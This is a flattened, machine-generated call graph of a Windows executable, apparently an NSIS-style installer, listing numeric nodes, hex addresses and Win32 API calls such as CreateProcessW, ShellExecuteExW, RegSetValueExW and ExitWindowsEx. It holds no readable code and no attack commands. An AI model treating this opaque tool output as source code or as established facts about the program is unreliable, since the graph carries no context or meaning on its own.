3170->3171 3172 405b94 MessageBoxIndirectW 3171->3172 3172->3163 3173->3150 3175 4055d4 3174->3175 3184 40189c 3174->3184 3176 4055f0 lstrlenW 3175->3176 3177 406571 21 API calls 3175->3177 3178 405619 3176->3178 3179 4055fe lstrlenW 3176->3179 3177->3176 3181 40562c 3178->3181 3182 40561f SetWindowTextW 3178->3182 3180 405610 lstrcatW 3179->3180 3179->3184 3180->3178 3183 405632 SendMessageW SendMessageW SendMessageW 3181->3183 3181->3184 3182->3181 3183->3184 3185 4032b9 3184->3185 3187 4032d2 3185->3187 3186 403300 3216 4034b1 3186->3216 3187->3186 3221 4034c7 SetFilePointer 3187->3221 3191 40344a 3193 40348c 3191->3193 3198 40344e 3191->3198 3192 40331d GetTickCount 3194 4018af 3192->3194 3201 403349 3192->3201 3195 4034b1 ReadFile 3193->3195 3194->3160 3194->3161 3195->3194 3196 4034b1 ReadFile 3196->3201 3197 4034b1 ReadFile 3197->3198 3198->3194 3198->3197 3199 4060d6 WriteFile 3198->3199 3199->3198 3200 40339f GetTickCount 3200->3201 3201->3194 3201->3196 3201->3200 3202 4033c4 MulDiv wsprintfW 3201->3202 3219 4060d6 WriteFile 3201->3219 3203 4055b9 28 API calls 3202->3203 3203->3201 3205->3142 3206->3143 3208 4017b4 lstrcatW 3207->3208 3209 405e1f lstrcatW 3207->3209 3208->3142 3209->3208 3211 4068b2 3210->3211 3212 4068a7 FindClose 3210->3212 3211->3150 3212->3211 3214 406011 SetFileAttributesW 3213->3214 3215 40601e 3213->3215 3214->3215 3215->3150 3222 4060a7 ReadFile 3216->3222 3220 4060f4 3219->3220 3220->3201 3221->3186 3223 40330b 3222->3223 3223->3191 3223->3192 3223->3194 3932 4014f5 SetForegroundWindow 3933 402c2f 3932->3933 3934 401a77 3935 402d89 21 API calls 3934->3935 3936 401a80 3935->3936 3937 402d89 21 API calls 3936->3937 3938 401a25 3937->3938 3939 401578 3940 401591 3939->3940 3941 401588 ShowWindow 3939->3941 3942 402c2f 3940->3942 3943 40159f ShowWindow 3940->3943 3941->3940 3943->3942 3944 4056f8 3945 4058a2 3944->3945 3946 405719 GetDlgItem GetDlgItem GetDlgItem 3944->3946 3948 4058d3 3945->3948 3949 4058ab GetDlgItem CreateThread CloseHandle 3945->3949 3989 4044e8 SendMessageW 3946->3989 3951 4058fe 3948->3951 3952 405923 3948->3952 3953 4058ea ShowWindow ShowWindow 3948->3953 3949->3948 3950 405789 3956 405790 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3950->3956 3954 40595e 3951->3954 3958 405912 3951->3958 3959 405938 ShowWindow 3951->3959 3955 40451a 8 API calls 3952->3955 3991 4044e8 SendMessageW 3953->3991 3954->3952 3965 40596c SendMessageW 3954->3965 3970 405931 3955->3970 3963 4057e2 SendMessageW SendMessageW 3956->3963 3964 4057fe 3956->3964 3992 40448c 3958->3992 3961 405958 3959->3961 3962 40594a 3959->3962 3967 40448c SendMessageW 3961->3967 3966 4055b9 28 API calls 3962->3966 3963->3964 3968 405811 3964->3968 3969 405803 SendMessageW 3964->3969 3965->3970 3971 405985 CreatePopupMenu 3965->3971 3966->3961 3967->3954 3973 4044b3 22 API calls 3968->3973 3969->3968 3972 406571 21 API calls 3971->3972 3974 405995 AppendMenuW 3972->3974 3975 405821 3973->3975 3978 4059b2 GetWindowRect 3974->3978 3979 4059c5 TrackPopupMenu 3974->3979 3976 40582a ShowWindow 3975->3976 3977 40585e GetDlgItem SendMessageW 3975->3977 3980 405840 ShowWindow 3976->3980 3981 40584d 3976->3981 3977->3970 3983 405885 SendMessageW SendMessageW 3977->3983 3978->3979 3979->3970 3982 4059e0 3979->3982 3980->3981 3990 4044e8 SendMessageW 3981->3990 3984 4059fc SendMessageW 3982->3984 3983->3970 3984->3984 3985 405a19 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3984->3985 3987 405a3e SendMessageW 3985->3987 3987->3987 3988 405a67 GlobalUnlock SetClipboardData CloseClipboard 3987->3988 3988->3970 3989->3950 3990->3977 3991->3951 3993 404493 3992->3993 3994 404499 SendMessageW 3992->3994 3993->3994 3994->3952 3995 4023f9 3996 402dab 21 API calls 3995->3996 3997 402408 3996->3997 3998 402dab 21 API calls 3997->3998 3999 402411 3998->3999 4000 402dab 21 API calls 3999->4000 4001 40241b GetPrivateProfileStringW 4000->4001 4002 404cfa 4003 404d26 4002->4003 4004 404d0a 4002->4004 4006 404d59 4003->4006 4007 404d2c SHGetPathFromIDListW 4003->4007 4013 405b78 GetDlgItemTextW 4004->4013 4009 404d43 SendMessageW 4007->4009 4010 404d3c 4007->4010 4008 404d17 SendMessageW 4008->4003 4009->4006 4011 40140b 2 API calls 4010->4011 4011->4009 4013->4008 4014 401ffb 4015 402dab 21 API calls 4014->4015 4016 402002 4015->4016 4017 406891 2 API calls 4016->4017 4018 402008 4017->4018 4020 402019 4018->4020 4021 40647b wsprintfW 4018->4021 4021->4020 4022 401b7c 4023 402dab 21 API calls 4022->4023 4024 401b83 4023->4024 4025 402d89 21 API calls 4024->4025 4026 401b8c wsprintfW 4025->4026 4027 402c2f 4026->4027 4028 401000 4029 401037 BeginPaint GetClientRect 4028->4029 4031 40100c DefWindowProcW 4028->4031 4032 4010f3 4029->4032 4033 401179 4031->4033 4034 401073 CreateBrushIndirect FillRect DeleteObject 4032->4034 4035 4010fc 4032->4035 4034->4032 4036 401102 CreateFontIndirectW 4035->4036 4037 401167 EndPaint 4035->4037 4036->4037 4038 401112 6 API calls 4036->4038 4037->4033 4038->4037 4039 401680 4040 402dab 21 API calls 4039->4040 4041 401687 4040->4041 4042 402dab 21 API calls 4041->4042 4043 401690 4042->4043 4044 402dab 21 API calls 4043->4044 4045 401699 MoveFileW 4044->4045 4046 4016a5 4045->4046 4047 4016ac 4045->4047 4049 401423 28 API calls 4046->4049 4048 406891 2 API calls 4047->4048 4051 4022fb 4047->4051 4050 4016bb 4048->4050 4049->4051 4050->4051 4052 4062f4 40 API calls 4050->4052 4052->4046 4053 401503 4054 401508 4053->4054 4056 401520 4053->4056 4055 402d89 21 API calls 4054->4055 4055->4056 4057 401a04 4058 402dab 21 API calls 4057->4058 4059 401a0b 4058->4059 4060 402dab 21 API calls 4059->4060 4061 401a14 4060->4061 4062 401a1b lstrcmpiW 4061->4062 4063 401a2d lstrcmpW 4061->4063 4064 401a21 4062->4064 4063->4064 4065 402304 4066 402dab 21 API calls 4065->4066 4067 40230a 4066->4067 4068 402dab 21 API calls 4067->4068 4069 402313 4068->4069 4070 402dab 21 API calls 4069->4070 4071 40231c 4070->4071 4072 406891 2 API calls 4071->4072 4073 402325 4072->4073 4074 402336 lstrlenW lstrlenW 4073->4074 4075 402329 4073->4075 4077 4055b9 28 API calls 4074->4077 4076 4055b9 28 API calls 4075->4076 4079 402331 4075->4079 4076->4079 4078 402374 SHFileOperationW 4077->4078 4078->4075 4078->4079 4080 401d86 4081 401d99 GetDlgItem 4080->4081 4082 401d8c 4080->4082 4083 401d93 4081->4083 4084 402d89 21 API calls 4082->4084 4085 401dda GetClientRect LoadImageW SendMessageW 4083->4085 4086 402dab 21 API calls 4083->4086 4084->4083 4088 401e38 4085->4088 4090 401e44 4085->4090 4086->4085 4089 401e3d DeleteObject 4088->4089 4088->4090 4089->4090 4091 402388 4092 4023a2 4091->4092 4093 40238f 4091->4093 4094 406571 21 API calls 4093->4094 4095 40239c 4094->4095 4096 405b94 MessageBoxIndirectW 4095->4096 4096->4092 3372 401389 3374 401390 3372->3374 3373 4013fe 3374->3373 3375 4013cb MulDiv SendMessageW 3374->3375 3375->3374 4097 402c0a SendMessageW 4098 402c24 InvalidateRect 4097->4098 4099 402c2f 4097->4099 4098->4099 3413 40350f SetErrorMode GetVersionExW 3414 403563 GetVersionExW 3413->3414 3415 40359b 3413->3415 3414->3415 3416 4035f2 3415->3416 3417 406928 5 API calls 3415->3417 3418 4068b8 3 API calls 3416->3418 3417->3416 3419 403608 lstrlenA 3418->3419 3419->3416 3420 403618 3419->3420 3421 406928 5 API calls 3420->3421 3422 40361f 3421->3422 3423 406928 5 API calls 3422->3423 3424 403626 3423->3424 3425 406928 5 API calls 3424->3425 3426 403632 #17 OleInitialize SHGetFileInfoW 3425->3426 3501 406534 lstrcpynW 3426->3501 3429 403681 GetCommandLineW 3502 406534 lstrcpynW 3429->3502 3431 403693 3432 405e30 CharNextW 3431->3432 3433 4036b9 CharNextW 3432->3433 3441 4036cb 3433->3441 3434 4037cd 3435 4037e1 GetTempPathW 3434->3435 3503 4034de 3435->3503 3437 4037f9 3438 403853 DeleteFileW 3437->3438 3439 4037fd GetWindowsDirectoryW lstrcatW 3437->3439 3513 403082 GetTickCount GetModuleFileNameW 3438->3513 3442 4034de 12 API calls 3439->3442 3440 405e30 CharNextW 3440->3441 3441->3434 3441->3440 3447 4037cf 3441->3447 3444 403819 3442->3444 3444->3438 3446 40381d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3444->3446 3445 403867 3448 403a5a ExitProcess OleUninitialize 3445->3448 3453 40390e 3445->3453 3454 405e30 CharNextW 3445->3454 3450 4034de 12 API calls 3446->3450 3598 406534 lstrcpynW 3447->3598 3451 403a90 3448->3451 3452 403a6c 3448->3452 3458 40384b 3450->3458 3455 403b14 ExitProcess 3451->3455 3456 403a98 GetCurrentProcess OpenProcessToken 3451->3456 3459 405b94 MessageBoxIndirectW 3452->3459 3541 403c06 3453->3541 3469 403886 3454->3469 3460 403ab0 LookupPrivilegeValueW AdjustTokenPrivileges 3456->3460 3461 403ae4 3456->3461 3458->3438 3458->3448 3464 403a7a ExitProcess 3459->3464 3460->3461 3465 406928 5 API calls 3461->3465 3466 403aeb 3465->3466 3471 403b00 ExitWindowsEx 3466->3471 3474 403b0d 3466->3474 3467 4038e4 3472 405f0b 18 API calls 3467->3472 3468 403927 3470 405aff 5 API calls 3468->3470 3469->3467 3469->3468 3473 40392c lstrlenW 3470->3473 3471->3455 3471->3474 3475 4038f0 3472->3475 3601 406534 lstrcpynW 3473->3601 3606 40140b 3474->3606 3475->3448 3599 406534 lstrcpynW 3475->3599 3478 403946 3480 40395e 3478->3480 3602 406534 lstrcpynW 3478->3602 3484 403984 wsprintfW 3480->3484 3488 4039b0 3480->3488 3481 403903 3600 406534 lstrcpynW 3481->3600 3485 406571 21 API calls 3484->3485 3485->3480 3486 405a88 2 API calls 3486->3488 3487 405ae2 2 API calls 3487->3488 3488->3480 3488->3484 3488->3486 3488->3487 3489 4039c0 GetFileAttributesW 3488->3489 3490 4039fa SetCurrentDirectoryW 3488->3490 3494 405c40 71 API calls 3488->3494 3495 4039f8 3488->3495 3496 4062f4 40 API calls 3488->3496 3497 406571 21 API calls 3488->3497 3499 403a82 CloseHandle 3488->3499 3500 406891 2 API calls 3488->3500 3603 405b17 CreateProcessW 3488->3603 3489->3488 3491 4039cc DeleteFileW 3489->3491 3492 4062f4 40 API calls 3490->3492 3491->3488 3493 403a09 CopyFileW 3492->3493 3493->3488 3493->3495 3494->3488 3495->3448 3496->3488 3497->3488 3499->3495 3500->3488 3501->3429 3502->3431 3504 4067e2 5 API calls 3503->3504 3506 4034ea 3504->3506 3505 4034f4 3505->3437 3506->3505 3507 405e03 3 API calls 3506->3507 3508 4034fc 3507->3508 3509 405ae2 2 API calls 3508->3509 3510 403502 3509->3510 3511 406053 2 API calls 3510->3511 3512 40350d 3511->3512 3512->3437 3609 406024 GetFileAttributesW CreateFileW 3513->3609 3515 4030c2 3533 4030d2 3515->3533 3610 406534 lstrcpynW 3515->3610 3517 4030e8 3518 405e4f 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 406534 lstrcpynW 3519->3611 3521 4030f9 GetFileSize 3522 4031f3 3521->3522 3535 403110 3521->3535 3612 40301e 3522->3612 3524 4031fc 3526 40322c GlobalAlloc 3524->3526 3524->3533 3624 4034c7 SetFilePointer 3524->3624 3525 4034b1 ReadFile 3525->3535 3623 4034c7 SetFilePointer 3526->3623 3528 40325f 3532 40301e 6 API calls 3528->3532 3530 403215 3534 4034b1 ReadFile 3530->3534 3531 403247 3536 4032b9 35 API calls 3531->3536 3532->3533 3533->3445 3537 403220 3534->3537 3535->3522 3535->3525 3535->3528 3535->3533 3538 40301e 6 API calls 3535->3538 3539 403253 3536->3539 3537->3526 3537->3533 3538->3535 3539->3533 3539->3539 3540 403290 SetFilePointer 3539->3540 3540->3533 3542 406928 5 API calls 3541->3542 3543 403c1a 3542->3543 3544 403c20 GetUserDefaultUILanguage 3543->3544 3545 403c32 3543->3545 3629 40647b wsprintfW 3544->3629 3547 406402 3 API calls 3545->3547 3549 403c62 3547->3549 3548 403c30 3630 403edc 3548->3630 3550 403c81 lstrcatW 3549->3550 3551 406402 3 API calls 3549->3551 3550->3548 3551->3550 3554 405f0b 18 API calls 3555 403cb3 3554->3555 3556 403d47 3555->3556 3558 406402 3 API calls 3555->3558 3557 405f0b 18 API calls 3556->3557 3559 403d4d 3557->3559 3560 403ce5 3558->3560 3561 403d5d LoadImageW 3559->3561 3562 406571 21 API calls 3559->3562 3560->3556 3565 403d06 lstrlenW 3560->3565 3569 405e30 CharNextW 3560->3569 3563 403e03 3561->3563 3564 403d84 RegisterClassW 3561->3564 3562->3561 3568 40140b 2 API calls 3563->3568 3566 40391e 3564->3566 3567 403dba SystemParametersInfoW CreateWindowExW 3564->3567 3570 403d14 lstrcmpiW 3565->3570 3571 403d3a 3565->3571 3566->3448 3567->3563 3572 403e09 3568->3572 3573 403d03 3569->3573 3570->3571 3574 403d24 GetFileAttributesW 3570->3574 3575 405e03 3 API calls 3571->3575 3572->3566 3577 403edc 22 API calls 3572->3577 3573->3565 3576 403d30 3574->3576 3578 403d40 3575->3578 3576->3571 3579 405e4f 2 API calls 3576->3579 3580 403e1a 3577->3580 3638 406534 lstrcpynW 3578->3638 3579->3571 3582 403e26 ShowWindow 3580->3582 3583 403ea9 3580->3583 3584 4068b8 3 API calls 3582->3584 3639 40568c OleInitialize 3583->3639 3586 403e3e 3584->3586 3588 403e4c GetClassInfoW 3586->3588 3591 4068b8 3 API calls 3586->3591 3587 403eaf 3589 403eb3 3587->3589 3590 403ecb 3587->3590 3593 403e60 GetClassInfoW RegisterClassW 3588->3593 3594 403e76 DialogBoxParamW 3588->3594 3589->3566 3595 40140b 2 API calls 3589->3595 3592 40140b 2 API calls 3590->3592 3591->3588 3592->3566 3593->3594 3596 40140b 2 API calls 3594->3596 3595->3566 3597 403e9e 3596->3597 3597->3566 3598->3435 3599->3481 3600->3453 3601->3478 3602->3480 3604 405b56 3603->3604 3605 405b4a CloseHandle 3603->3605 3604->3488 3605->3604 3607 401389 2 API calls 3606->3607 3608 401420 3607->3608 3608->3455 3609->3515 3610->3517 3611->3521 3613 403027 3612->3613 3614 40303f 3612->3614 3615 403030 DestroyWindow 3613->3615 3616 403037 3613->3616 3617 403047 3614->3617 3618 40304f GetTickCount 3614->3618 3615->3616 3616->3524 3625 406964 3617->3625 3620 403080 3618->3620 3621 40305d CreateDialogParamW ShowWindow 3618->3621 3620->3524 3621->3620 3623->3531 3624->3530 3626 406981 PeekMessageW 3625->3626 3627 40304d 3626->3627 3628 406977 DispatchMessageW 3626->3628 3627->3524 3628->3626 3629->3548 3631 403ef0 3630->3631 3646 40647b wsprintfW 3631->3646 3633 403f61 3647 403f95 3633->3647 3635 403c91 3635->3554 3636 403f66 3636->3635 3637 406571 21 API calls 3636->3637 3637->3636 3638->3556 3650 4044ff 3639->3650 3641 4056d6 3642 4044ff SendMessageW 3641->3642 3644 4056e8 OleUninitialize 3642->3644 3643 4056af 3643->3641 3653 401389 3643->3653 3644->3587 3646->3633 3648 406571 21 API calls 3647->3648 3649 403fa3 SetWindowTextW 3648->3649 3649->3636 3651 404517 3650->3651 3652 404508 SendMessageW 3650->3652 3651->3643 3652->3651 3655 401390 3653->3655 3654 4013fe 3654->3643 3655->3654 3656 4013cb MulDiv SendMessageW 3655->3656 3656->3655 4100 40248f 4101 402dab 21 API calls 4100->4101 4102 4024a1 4101->4102 4103 402dab 21 API calls 4102->4103 4104 4024ab 4103->4104 4117 402e3b 4104->4117 4107 402933 4108 4024e3 4110 4024ef 4108->4110 4113 402d89 21 API calls 4108->4113 4109 402dab 21 API calls 4112 4024d9 lstrlenW 4109->4112 4111 40250e RegSetValueExW 4110->4111 4114 4032b9 35 API calls 4110->4114 4115 402524 RegCloseKey 4111->4115 4112->4108 4113->4110 4114->4111 4115->4107 4118 402e56 4117->4118 4121 4063cf 4118->4121 4122 4063de 4121->4122 4123 4024bb 4122->4123 4124 4063e9 RegCreateKeyExW 4122->4124 4123->4107 4123->4108 4123->4109 4124->4123 4125 402910 4126 402dab 21 API calls 4125->4126 4127 402917 FindFirstFileW 4126->4127 4128 40293f 4127->4128 4131 40292a 4127->4131 4133 40647b wsprintfW 4128->4133 4130 402948 4134 406534 lstrcpynW 4130->4134 4133->4130 4134->4131 4135 401911 4136 401948 4135->4136 4137 402dab 21 API calls 4136->4137 4138 40194d 4137->4138 4139 405c40 71 API calls 4138->4139 4140 401956 4139->4140 4141 401491 4142 4055b9 28 API calls 4141->4142 4143 401498 4142->4143 4144 401914 4145 402dab 21 API calls 4144->4145 4146 40191b 4145->4146 4147 405b94 MessageBoxIndirectW 4146->4147 4148 401924 4147->4148 4149 402896 4150 40289d 4149->4150 4151 402bae 4149->4151 4152 402d89 21 API calls 4150->4152 4153 4028a4 4152->4153 4154 4028b3 SetFilePointer 4153->4154 4154->4151 4155 4028c3 4154->4155 4157 40647b wsprintfW 4155->4157 4157->4151 4158 401f17 4159 402dab 21 API calls 4158->4159 4160 401f1d 4159->4160 4161 402dab 21 API calls 4160->4161 4162 401f26 4161->4162 4163 402dab 21 API calls 4162->4163 4164 401f2f 4163->4164 4165 402dab 21 API calls 4164->4165 4166 401f38 4165->4166 4167 401423 28 API calls 4166->4167 4168 401f3f 4167->4168 4175 405b5a ShellExecuteExW 4168->4175 4170 401f87 4172 402933 4170->4172 4176 4069d3 WaitForSingleObject 4170->4176 4173 401fa4 CloseHandle 4173->4172 4175->4170 4177 4069ed 4176->4177 4178 4069ff GetExitCodeProcess 4177->4178 4179 406964 2 API calls 4177->4179 4178->4173 4180 4069f4 WaitForSingleObject 4179->4180 4180->4177 4181 402f98 4182 402fc3 4181->4182 4183 402faa SetTimer 4181->4183 4184 403018 4182->4184 4185 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4182->4185 4183->4182 4185->4184 4186 401d1c 4187 402d89 21 API calls 4186->4187 4188 401d22 IsWindow 4187->4188 4189 401a25 4188->4189 4190 40149e 4191 4023a2 4190->4191 4192 4014ac PostQuitMessage 4190->4192 4192->4191 3041 401ba0 3042 401bf1 3041->3042 3043 401bad 3041->3043 3044 401bf6 3042->3044 3045 401c1b GlobalAlloc 3042->3045 3046 401c36 3043->3046 3051 401bc4 3043->3051 3059 4023a2 3044->3059 3079 406534 lstrcpynW 3044->3079 3060 406571 3045->3060 3047 406571 21 API calls 3046->3047 3046->3059 3049 40239c 3047->3049 3080 405b94 3049->3080 3077 406534 lstrcpynW 3051->3077 3052 401c08 GlobalFree 3052->3059 3054 401bd3 3078 406534 lstrcpynW 3054->3078 3057 401be2 3084 406534 lstrcpynW 3057->3084 3075 40657c 3060->3075 3061 4067c3 3062 4067dc 3061->3062 3107 406534 lstrcpynW 3061->3107 3062->3046 3064 406794 lstrlenW 3064->3075 3065 406571 15 API calls 3065->3064 3069 40668d GetSystemDirectoryW 3069->3075 3070 4066a3 GetWindowsDirectoryW 3070->3075 3071 406735 lstrcatW 3071->3075 3073 406571 15 API calls 3073->3075 3075->3061 3075->3064 3075->3065 3075->3069 3075->3070 3075->3071 3075->3073 3076 406705 SHGetPathFromIDListW CoTaskMemFree 3075->3076 3085 406402 3075->3085 3090 406928 GetModuleHandleA 3075->3090 3096 4067e2 3075->3096 3105 40647b wsprintfW 3075->3105 3106 406534 lstrcpynW 3075->3106 3076->3075 3077->3054 3078->3057 3079->3052 3081 405ba9 3080->3081 3082 405bf5 3081->3082 3083 405bbd MessageBoxIndirectW 3081->3083 3082->3059 3083->3082 3084->3059 3108 4063a1 3085->3108 3088 406436 RegQueryValueExW RegCloseKey 3089 406466 3088->3089 3089->3075 3091 406944 3090->3091 3092 40694e GetProcAddress 3090->3092 3112 4068b8 GetSystemDirectoryW 3091->3112 3094 40695d 3092->3094 3094->3075 3095 40694a 3095->3092 3095->3094 3102 4067ef 3096->3102 3097 40686a CharPrevW 3098 406865 3097->3098 3098->3097 3100 40688b 3098->3100 3099 406858 CharNextW 3099->3098 3099->3102 3100->3075 3102->3098 3102->3099 3103 406844 CharNextW 3102->3103 3104 406853 CharNextW 3102->3104 3115 405e30 3102->3115 3103->3102 3104->3099 3105->3075 3106->3075 3107->3062 3109 4063b0 3108->3109 3110 4063b4 3109->3110 3111 4063b9 RegOpenKeyExW 3109->3111 3110->3088 3110->3089 3111->3110 3113 4068da wsprintfW LoadLibraryExW 3112->3113 3113->3095 3116 405e36 3115->3116 3117 405e4c 3116->3117 3118 405e3d CharNextW 3116->3118 3117->3102 3118->3116 4193 404f20 GetDlgItem GetDlgItem 4194 404f72 7 API calls 4193->4194 4200 405197 4193->4200 4195 405019 DeleteObject 4194->4195 4196 40500c SendMessageW 4194->4196 4197 405022 4195->4197 4196->4195 4199 405059 4197->4199 4201 406571 21 API calls 4197->4201 4198 405279 4203 405325 4198->4203 4208 40518a 4198->4208 4213 4052d2 SendMessageW 4198->4213 4202 4044b3 22 API calls 4199->4202 4200->4198 4227 405206 4200->4227 4247 404e6e SendMessageW 4200->4247 4206 40503b SendMessageW SendMessageW 4201->4206 4207 40506d 4202->4207 4204 405337 4203->4204 4205 40532f SendMessageW 4203->4205 4215 405350 4204->4215 4216 405349 ImageList_Destroy 4204->4216 4224 405360 4204->4224 4205->4204 4206->4197 4212 4044b3 22 API calls 4207->4212 4210 40451a 8 API calls 4208->4210 4209 40526b SendMessageW 4209->4198 4214 405526 4210->4214 4228 40507e 4212->4228 4213->4208 4218 4052e7 SendMessageW 4213->4218 4219 405359 GlobalFree 4215->4219 4215->4224 4216->4215 4217 4054da 4217->4208 4222 4054ec ShowWindow GetDlgItem ShowWindow 4217->4222 4221 4052fa 4218->4221 4219->4224 4220 405159 GetWindowLongW SetWindowLongW 4223 405172 4220->4223 4229 40530b SendMessageW 4221->4229 4222->4208 4225 405177 ShowWindow 4223->4225 4226 40518f 4223->4226 4224->4217 4238 40539b 4224->4238 4252 404eee 4224->4252 4245 4044e8 SendMessageW 4225->4245 4246 4044e8 SendMessageW 4226->4246 4227->4198 4227->4209 4228->4220 4230 405154 4228->4230 4234 4050d1 SendMessageW 4228->4234 4235 405123 SendMessageW 4228->4235 4236 40510f SendMessageW 4228->4236 4229->4203 4230->4220 4230->4223 4231 4053df 4239 4054a5 4231->4239 4244 405453 SendMessageW SendMessageW 4231->4244 4234->4228 4235->4228 4236->4228 4238->4231 4242 4053c9 SendMessageW 4238->4242 4240 4054b0 InvalidateRect 4239->4240 4241 4054bc 4239->4241 4240->4241 4241->4217 4261 404e29 4241->4261 4242->4231 4244->4231 4245->4208 4246->4200 4248 404e91 GetMessagePos ScreenToClient SendMessageW 4247->4248 4249 404ecd SendMessageW 4247->4249 4250 404ec5 4248->4250 4251 404eca 4248->4251 4249->4250 4250->4227 4251->4249 4264 406534 lstrcpynW 4252->4264 4254 404f01 4265 40647b wsprintfW 4254->4265 4256 404f0b 4257 40140b 2 API calls 4256->4257 4258 404f14 4257->4258 4266 406534 lstrcpynW 4258->4266 4260 404f1b 4260->4238 4267 404d60 4261->4267 4263 404e3e 4263->4217 4264->4254 4265->4256 4266->4260 4268 404d79 4267->4268 4269 406571 21 API calls 4268->4269 4270 404ddd 4269->4270 4271 406571 21 API calls 4270->4271 4272 404de8 4271->4272 4273 406571 21 API calls 4272->4273 4274 404dfe lstrlenW wsprintfW SetDlgItemTextW 4273->4274 4274->4263 4275 402621 4276 402dab 21 API calls 4275->4276 4277 402628 4276->4277 4280 406024 GetFileAttributesW CreateFileW 4277->4280 4279 402634 4280->4279 4281 404623 lstrlenW 4282 404642 4281->4282 4283 404644 WideCharToMultiByte 4281->4283 4282->4283 4284 4025a3 4294 402deb 4284->4294 4287 402d89 21 API calls 4288 4025b6 4287->4288 4289 4025d2 RegEnumKeyW 4288->4289 4290 4025de RegEnumValueW 4288->4290 4292 402933 4288->4292 4291 4025f3 RegCloseKey 4289->4291 4290->4291 4291->4292 4295 402dab 21 API calls 4294->4295 4296 402e02 4295->4296 4297 4063a1 RegOpenKeyExW 4296->4297 4298 4025ad 4297->4298 4298->4287 4299 4049a4 4300 4049d0 4299->4300 4301 4049e1 4299->4301 4360 405b78 GetDlgItemTextW 4300->4360 4302 4049ed GetDlgItem 4301->4302 4309 404a4c 4301->4309 4304 404a01 4302->4304 4308 404a15 SetWindowTextW 4304->4308 4313 405eae 4 API calls 4304->4313 4305 404b30 4310 404cdf 4305->4310 4362 405b78 GetDlgItemTextW 4305->4362 4306 4049db 4307 4067e2 5 API calls 4306->4307 4307->4301 4314 4044b3 22 API calls 4308->4314 4309->4305 4309->4310 4315 406571 21 API calls 4309->4315 4312 40451a 8 API calls 4310->4312 4317 404cf3 4312->4317 4318 404a0b 4313->4318 4319 404a31 4314->4319 4320 404ac0 SHBrowseForFolderW 4315->4320 4316 404b60 4321 405f0b 18 API calls 4316->4321 4318->4308 4325 405e03 3 API calls 4318->4325 4322 4044b3 22 API calls 4319->4322 4320->4305 4323 404ad8 CoTaskMemFree 4320->4323 4324 404b66 4321->4324 4326 404a3f 4322->4326 4327 405e03 3 API calls 4323->4327 4363 406534 lstrcpynW 4324->4363 4325->4308 4361 4044e8 SendMessageW 4326->4361 4330 404ae5 4327->4330 4332 404b1c SetDlgItemTextW 4330->4332 4336 406571 21 API calls 4330->4336 4331 404a45 4334 406928 5 API calls 4331->4334 4332->4305 4333 404b7d 4335 406928 5 API calls 4333->4335 4334->4309 4343 404b84 4335->4343 4337 404b04 lstrcmpiW 4336->4337 4337->4332 4339 404b15 lstrcatW 4337->4339 4338 404bc5 4364 406534 lstrcpynW 4338->4364 4339->4332 4341 404bcc 4342 405eae 4 API calls 4341->4342 4344 404bd2 GetDiskFreeSpaceW 4342->4344 4343->4338 4347 405e4f 2 API calls 4343->4347 4348 404c1d 4343->4348 4346 404bf6 MulDiv 4344->4346 4344->4348 4346->4348 4347->4343 4349 404c8e 4348->4349 4350 404e29 24 API calls 4348->4350 4351 404cb1 4349->4351 4353 40140b 2 API calls 4349->4353 4352 404c7b 4350->4352 4365 4044d5 EnableWindow 4351->4365 4354 404c90 SetDlgItemTextW 4352->4354 4355 404c80 4352->4355 4353->4351 4354->4349 4357 404d60 24 API calls 4355->4357 4357->4349 4358 404ccd 4358->4310 4359 4048fd SendMessageW 4358->4359 4359->4310 4360->4306 4361->4331 4362->4316 4363->4333 4364->4341 4365->4358 4366 4015a8 4367 402dab 21 API calls 4366->4367 4368 4015af SetFileAttributesW 4367->4368 4369 4015c1 4368->4369 4370 401fa9 4371 402dab 21 API calls 4370->4371 4372 401faf 4371->4372 4373 4055b9 28 API calls 4372->4373 4374 401fb9 4373->4374 4375 405b17 2 API calls 4374->4375 4376 401fbf 4375->4376 4377 401fe2 CloseHandle 4376->4377 4379 4069d3 5 API calls 4376->4379 4381 402933 4376->4381 4377->4381 4380 401fd4 4379->4380 4380->4377 4383 40647b wsprintfW 4380->4383 4383->4377 3376 403b2c 3377 403b44 3376->3377 3378 403b36 CloseHandle 3376->3378 3383 403b71 3377->3383 3378->3377 3381 405c40 71 API calls 3382 403b55 3381->3382 3384 403b7f 3383->3384 3385 403b49 3384->3385 3386 403b84 FreeLibrary GlobalFree 3384->3386 3385->3381 3386->3385 3386->3386 4384 40552d 4385 405551 4384->4385 4386 40553d 4384->4386 4387 405559 IsWindowVisible 4385->4387 4390 405570 4385->4390 4388 405543 4386->4388 4396 40559a 4386->4396 4389 405566 4387->4389 4387->4396 4392 4044ff SendMessageW 4388->4392 4393 404e6e 5 API calls 4389->4393 4391 40559f CallWindowProcW 4390->4391 4395 404eee 4 API calls 4390->4395 4394 40554d 4391->4394 4392->4394 4393->4390 4395->4396 4396->4391 4397 40202f 4398 402dab 21 API calls 4397->4398 4399 402036 4398->4399 4400 406928 5 API calls 4399->4400 4401 402045 4400->4401 4402 402061 GlobalAlloc 4401->4402 4403 4020d1 4401->4403 4402->4403 4404 402075 4402->4404 4405 406928 5 API calls 4404->4405 4406 40207c 4405->4406 4407 406928 5 API calls 4406->4407 4408 402086 4407->4408 4408->4403 4412 40647b wsprintfW 4408->4412 4410 4020bf 4413 40647b wsprintfW 4410->4413 4412->4410 4413->4403 4414 40252f 4415 402deb 21 API calls 4414->4415 4416 402539 4415->4416 4417 402dab 21 API calls 4416->4417 4418 402542 4417->4418 4419 40254d RegQueryValueExW 4418->4419 4423 402933 4418->4423 4420 402573 RegCloseKey 4419->4420 4421 40256d 4419->4421 4420->4423 4421->4420 4425 40647b wsprintfW 4421->4425 4425->4420 4426 4021af 4427 402dab 21 API calls 4426->4427 4428 4021b6 4427->4428 4429 402dab 21 API calls 4428->4429 4430 4021c0 4429->4430 4431 402dab 21 API calls 4430->4431 4432 4021ca 4431->4432 4433 402dab 21 API calls 4432->4433 4434 4021d4 4433->4434 4435 402dab 21 API calls 4434->4435 4436 4021de 4435->4436 4437 40221d CoCreateInstance 4436->4437 4438 402dab 21 API calls 4436->4438 4441 40223c 4437->4441 4438->4437 4439 401423 28 API calls 4440 4022fb 4439->4440 4441->4439 4441->4440 4442 403fb4 4443 403fcc 4442->4443 4444 40412d 4442->4444 4443->4444 4445 403fd8 4443->4445 4446 40413e GetDlgItem 